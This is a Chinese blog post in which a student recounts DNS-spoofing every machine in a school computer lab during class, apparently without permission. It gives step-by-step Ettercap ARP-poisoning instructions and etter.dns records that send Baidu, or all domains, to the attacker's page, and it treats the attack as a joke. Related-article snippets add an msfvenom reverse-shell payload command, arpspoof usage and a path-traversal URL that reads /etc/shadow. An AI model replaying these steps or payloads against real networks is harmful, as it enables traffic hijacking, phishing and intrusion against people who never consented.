在学校机房进行的一次内网渗透(DNS欺骗)

最新推荐文章于 2024-05-28 11:36:42 发布
最新推荐文章于 2024-05-28 11:36:42 发布
阅读量1.4w 收藏 101
点赞数 16
分类专栏: 网络安全 文章标签: dns kali linux 内网渗透 DNS欺骗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Terry_Solar/article/details/53000518
版权

       上个星期的课上林老板讲到了很多年前的钓鱼网站原理,今天心血来潮突然想试试,就没有好好听课了哈哈哈哈。(求林老板别挂我科大笑

小白一只,求大牛们勿喷,有不对的地方请帮忙指正。


一、系统环境

  • Kali Linux 2.0 (前身是Backtrack系列):著名的渗透测试系统,集成了很多专业的渗透工具
  • Ettercap 0.8.2 :一款强大的网络嗅探工具,可以进行ARP欺骗,DNS劫持,中间人攻击等等
  • 靶机: Windows 7系统,172.21.134.0/255网段内所有主机

二、准备阶段

1.首先,把内网中全部的活跃主机扫描出来。

2.选中Hosts选项卡,点击 Scan for Hosts

扫描完成后可以看到主机列表


3.在列表中找到网关IP,也可以说是路由器IP,点击Add to Target1,再选中其他所有要攻击的IP,点击Add to Target2

然后在Targets -> Current targets 中可以看到

4.加载攻击插件

点击 Plugins -> Manage Plugins,找到dns_spoof插件,双击打开,名字前面有星号即可


点击 Mitm -> ARP Poisoning ,选中 Sniff Remote Connections


5.在本地搭建http服务器,显示简单网页即可



6.修改攻击的配置文件


打开  /etc/ettercap/etter.dns  文件,添加一条 A 记录

例如:

www.baidu.com      A      你搭建的服务器IP        //这样的话,靶机访问百度的话会显示你的网页内容,并且依然显示百度的域名

*      A      你的服务器IP        //这样设置,靶机访问所有的网站都会指向你的IP

三、开始攻击

点击 Start Sniffing

四、效果

这时候,机房内其他主机只要打开百度,就会看到这个页面~

仅供学习交流渗透技术,严禁用于非法用途。

PigVillage_Terry
关注
  • 16
    点赞
  • 101
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
kali内网渗透学习笔记
goodhu的博客
03-09 2021
kali内网渗透学习笔记 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=33333 -f exe x> /root/桌面/test1.exe LHOST是主机ip ,LPORT是自己设置的端口号 使用msfconsole监听木马(依次输入下列命令) use exp...
学校计算机机房管理制度.doc
11-13
8. 机房管理人员应该在上课后十分钟内及下课前五分钟对各个机房进行巡视,及时处理和记录所出现的问题。 9. 加强对电源设备、机器设备和网络设备的巡视,做到勤问、勤看、勤摸、勤闻。 10. 经常保养维护机房设备,...
渗透学校计算机室,内网渗透技术之渗透学校内网过程 -电脑资料
weixin_42510453的博客
07-04 529
本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述,从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。没现有SU和MYSQL之类的信息。E:盘可以浏览F:盘可以浏览本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。再翻翻别的站点,目录可以...
学校机房渗透测试实战
最新发布
hg885210的博客
05-28 1632
介绍三种关于学校机房渗透测试的思路:找系统漏洞、找软件漏洞、物理攻击badusb
一次学校AVCON系统的渗透
大方子
07-21 1075
起初就是想扫下,内网的IIS服务器,看看内网是否存在put漏洞的IIS服务器。 出来一堆的结果就顺手点了下。 发现目标存在任意文件下载,就把系统的shadow文件给下载了回来 http://xxxxxxx/download.action?filename=../../../../../../etc/shadow 想着直接解密登录,但是后来发现root的密码解不开...
关于学校网的渗透与入侵
m0_72703340的博客
02-11 1813
学校漏洞扫描(不进行任何非法用途)
计算机课入侵学校电脑,有关学校机房(上电脑课的那种),怎么获得管理员权限?...
weixin_42498108的博客
07-11 1361
。。。搞破坏啊呵呵 我喜欢学校的电脑如果限制了你权限的话 估计是硬件限制的了 所以是驱动级的 一旦开机就完蛋就进入了限制模式了 所以要在还没进去系统的时候就破准备个U盘 上百度搜索 U盘一键装系统 把U盘转换成装系统用的移动硬盘(怎么转换官方有图文教程)到了学校 把U盘插上去 开电脑 马上看着屏幕 因为开机的时候他会提示你进入一个叫BIOS的东西应该按什么键的 所以你要超认真的看 他告诉你要按什么...
学校机房管理系统ASP+ACCESS源码
01-22
【程序老媛出品,必属精品,亲测校正,质量保证】 资源名:学校机房管理系统ASP+ACCESS源码 资源类型:程序源代码 源码说明: 基于asp 和 access开发的学校机房管理系统 适合人群:新手及有一定经验的开发人员
浅论学校计算机机房的维护与管理.doc
12-21
学校计算机机房的维护与管理是教学的重要环节,需要我们从多方面进行管理和维护,包括使用特定软件进行系统维护、使用WINDOWS表进行系统维护、预防病毒感染、室内环境的管理等。只有这样,才能提供一个良好的工作...
建德市工业技术学校计算机机房管理制度.doc
06-22
总的来说,这一管理制度体现了学校对计算机机房的严谨管理,注重培养学生的自律性和责任感,同时也为机房的高效运营提供了保障。通过这样的制度,可以预防潜在问题,提高教学效率,保护计算机设备,维护良好的教学...
基于J2EE 的学校机房管理系统的设计与应用
04-16
设计了学校机房管理的信息化系统,采用构建J2EE 平台的方法,通过分析学校机房管理系统现实需求,介绍了基于J2EE 的学校机房管理系统架构,对系统关键模块的功能及设计方案进行详细阐述。得到结果认为,机房管理系统...
实战|渗透学校内网服务器
zhangge3663的博客
02-01 4710
”黑“掉自己的学校,可能是大多数黑阔们学生时代共同的执念。 前言: 心血来潮,突然想看看学校有没有能用永恒之蓝打下来的机器,顺便来一波内网渗透,想想上一次测试还是刚爆出永恒之蓝的利用工具的时候,那时候msf都还没整合进去,现在直接就能用msf方便多了。 信息收集: 已知 10.10.10.0/24 为学校各种服务器使用的IP 使用MSF中的批量ms17_010验证模块: msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxili.
kali内网渗透小技巧
m0_55017965的博客
03-29 3084
基础知识点: 重点:让kali和其他电脑连接在同一个内网上 arpspoof:arp断网攻击 1.ifconfig输入,观察自己Kali内网IP 2.查询与自己kali处于一个内网的IP:fping -asg +ip地址 3.攻击任何一台属于内网的主机 4.arpspoof -i eth0 -t ip地址 目标网关(可以自己计算) 另外,还可以进行目标监听,知道对方在访问什么图片,网址,一切归功于arp协议的漏洞。 ...
某校园内网渗透测试
qq_28624871的博客
05-10 3621
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
内网渗透Kali三步实现内网ARP欺骗
午夜安全
09-21 3048
内网渗透Kali三步实现内网ARP欺骗 声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径! 1.1双向欺骗 攻击者(kali):192.168.1.105 目标机器(已取得授权):192.168.1.101 网关:192.168.1.1 kali欺骗目标机器说自己是192.168.1.1,同时欺骗网关说自己是192.168.1.101。 命令:arpspoof –i eth...
Kali渗透-ARP断网攻击与监听
热门推荐
道阻且长,行则将至。
02-29 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。 环境说明 主机 IP地址 Kali Linu...
内网渗透神器之Kali Linux整体入门之一信息收集
炼丹师的博客
02-13 944
Kali Linux,搞网络安全的朋友必备的利器,主要用于渗透测试以及数字取证。其中预装了600多种渗透测试工具,整合起来分为又分为十四大类;下面分别是Kali Linux的界面(可以随时更改): Kali如此多的工具常常让初学者一脸懵逼,而且kali和其他操作系统不太一样,他是滚动发行,也就意味着经常更新。 我在以前搞渗透的时候也经常容易混乱,经过了很长一段时间的摸索,我发现使用Kali也是很...
教新手入侵内网的思路
清流弯弯
10-03 2235
<br /> 简单内网渗透刺探命令:<br />  1.ipconfig /all<br />  //可以查看到当前网卡配置信息,包括所属域以及IP段<br />  这个命令可以看到:<br /> <br />    主机名字---shwdm,<br />    IP--192.168.103.8,<br />    网关IP---192.168.103.10,<br />    DNS 域名解析地址IP---192.168.100.1,<br />    主WINS服务器IP---10.0.22.5<br
近源渗透从监控系统到机房再到教育局网络安全
2301_79475922的博客
09-02 393
监控室的位置居花某所知是在1楼的位置,每次放学都会路过,但是记不清是几号了,微机室的位置是在2楼,同样记不清号是20几了,而1楼和2楼同样分布有大量的教室和办公室,所以网络分布还是很杂的,但同时这两个也是比较好分辨的,办公室的计算机通常来说没人用会关机,教室里就更不用说了上面花某也说过每个教室联网的可能就只有一个电子黑板了,而放学后会关机下网,所以说除去办公室和教室放假已下网的设备,像监控室和服务器这类上网设备还是比较简单扫出来的。没胆量也违法,所以只能搞近源。也是最麻烦的,也是我拖了这么久的主要原因。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值